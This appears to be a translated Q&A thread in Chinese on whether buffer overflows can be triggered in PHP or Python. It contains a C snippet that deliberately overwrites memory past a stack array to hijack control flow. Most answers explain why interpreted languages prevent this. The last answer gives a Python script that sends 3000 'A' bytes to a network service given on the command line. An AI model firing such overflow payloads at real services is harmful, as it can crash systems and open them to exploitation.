如何在 PHP/Python 中进行缓冲区溢出？

Question

这是c中的一个例子：

#include <stdio.h>
#include <string.h>

void bad() {
    printf("Oh shit really bad~!\r\n");
}

void foo() {
    char overme[4] = "WOW";
    *(int*)(overme+8) = (int)bad;
}

int main() {
   foo();
}

Answer 1

Python 和 PHP 按照其他人建议的方式进行解释这一事实实际上并不是重点。关键是，它们公开的几乎所有 API 和语言语义都经过严格的错误检查，因此不可能出现可利用的未定义行为。即使你编译了语言，那也是不可能的。这并不意味着您不能公开可以执行任何操作的不安全 API。事实上，使用 Python 的 ctypes 模块，应该可以创建类似的行为，但意外地做到这一点要困难得多。

Answer 2

由于 PHP 是一种脚本语言，没有指针，并且字符串类型是二进制安全的，因此这些东西在 PHP 中不起作用。

但你为什么要做这样的事呢？

（哦，PHP 中可能存在导致缓冲区溢出的错误，但这不是任何可以依赖的东西，而且通常很快就能修复......）

Answer 3

很抱歉：您遇到了 Python 的弱点。不幸的是，这是设计使然，所以我们对此无能为力。也许你应该选择 C。

正如 Martin v. Löwis 所说：

抱歉，Python 不支持缓冲区溢出。

PS 哇。好像几个月前我就读过那篇文章，但现在已经过去七年零一天了。

Answer 4

在 PHP 中做类似的事情不会导致相同的行为。

PHP 被解释并始终检查您正在执行的操作是否有效。因此您不能 - 例如 - 溢出缓冲区。

Answer 5

因为 php、python 和每种解释性语言首先必须通过解释器，并且您没有对内存的完全访问权限，所以这种语言不会让您做某些类型的游戏，例如您发布的代码。

Answer 6

import sys
import socket

for carg in sys.argv:

    if carg == "-S":

        argnum= sys.argv.index(carg)

        argnum +=1

        host = sys.argv[argnum]

    elif carg == "-p":

        argnum = sys.argv.index(carg)

        argnum +=1

        port = sys.argv[argnum]

buffer = "\x41"* 3000

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

s.send("USV" + buffer)

s.close()